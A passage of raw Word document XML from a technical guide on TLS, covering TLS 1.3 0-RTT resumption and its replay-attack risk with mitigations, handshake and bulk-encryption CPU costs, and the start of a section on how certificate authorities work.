          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Handshake is signed and encrypted earlier (less plaintext on the wire).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E876444" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 TLS 1.3 0-RTT Resumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E92B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ultimate performance optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE723B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If a client has connected to this server before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA12AC9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF32355" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client                                          Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F4434" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00084DF2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── ClientHello + KeyShare + {Early Data} ──&gt;|  (0-RTT: data sent immediately!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2E23A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CDB671" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ServerHello + KeyShare + {Finished} ────|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DCFFB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {HTTP Response to early data} ──────────|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749FFB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE313B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>On a previous connection, the server issued a "session ticket" (encrypted blob containing the session state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77912C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>On reconnection, the client sends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09020D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ClientHello with the session ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A087FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A key share derived from the ticket's PSK (Pre-Shared Key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DB186" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early data (0-RTT):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The HTTP request, encrypted with keys derived from the PSK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE05FDB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server decrypts the early data immediately (no waiting for full handshake).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA5043" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server processes the request and can respond before the handshake is even complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11761659" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The 0-RTT security concern — replay attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A441F68" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>0-RTT data has no anti-replay protection. An attacker who records the ClientHello + early data can replay it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275D923" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the early data is "transfer $1000" → attacker replays it → $2000 transferred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17CD0A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221AA63" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Servers should only accept 0-RTT for idempotent requests (GET, not POST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309262D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Implement single-use session tickets (server tracks which tickets have been used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE5D75F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Accept 0-RTT only within a short time window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84437B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Application-level idempotency keys protect against replays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DBC26" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 The Computational Cost of TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7B7F2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Handshake cost (per new connection):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537"/>
        <w:gridCol w:w="1293"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4E76B3E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E8BD51" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operation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B3B6C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="509D7D6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E14C36" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>RSA 2048-bit signature verification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358789" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~0.1ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0BBAD1F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E05173" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>ECDHE x25519 key generation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A186BC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~0.05ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="195232E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1580FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:lastRenderedPageBreak/>
              <w:t>ECDHE shared secret computation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0253B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~0.05ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2043100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769957" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>AES-GCM key derivation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E5498A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~0.01ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2628260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CB644A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Total handshake CPU (per connection)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D3531B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>~0.3ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D488222" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bulk encryption cost (per byte of data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B54226" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>AES-GCM with AES-NI hardware acceleration (present in all modern CPUs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B75F94" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Throughput: 5–10 GB/s per core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA9E50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Per-request overhead for a typical 1KB response: ~0.0001ms (negligible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F82C1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The conclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> TLS overhead is dominated by the handshake latency (network round trips), not CPU. With TLS 1.3 (1 RTT) and connection reuse (keep-alive), the cost is nearly zero for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1588F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="4CA6B13D">
          <v:rect id="_x0000_i3978" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F41BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Certificate System — The Trust Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139B6B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 How Certificates Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2285A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> How does a client know that the server it's connecting to is REALLY api.example.com and not an impersonator?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D86D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — Certificate Authority (CA) model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9C6FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server operator generates a key pair (public + private key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3F646" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Creates a Certificate Signing Request (CSR) containing: domain name, public key, organization info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB9E1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Submits CSR to a Certificate Authority (CA) — e.g., Let's Encrypt, DigiCert, Sectigo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDB1B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA verifies the operator controls the domain (via DNS challenge, HTTP challenge, or organization validation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC700D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA signs the certificate with the CA's own private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977DF4A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server presents this signed certificate during TLS handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE1A03" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Client verifies: "Is this certificate signed by a CA I trust?" (checks against its built-in trust store).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8AFCB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
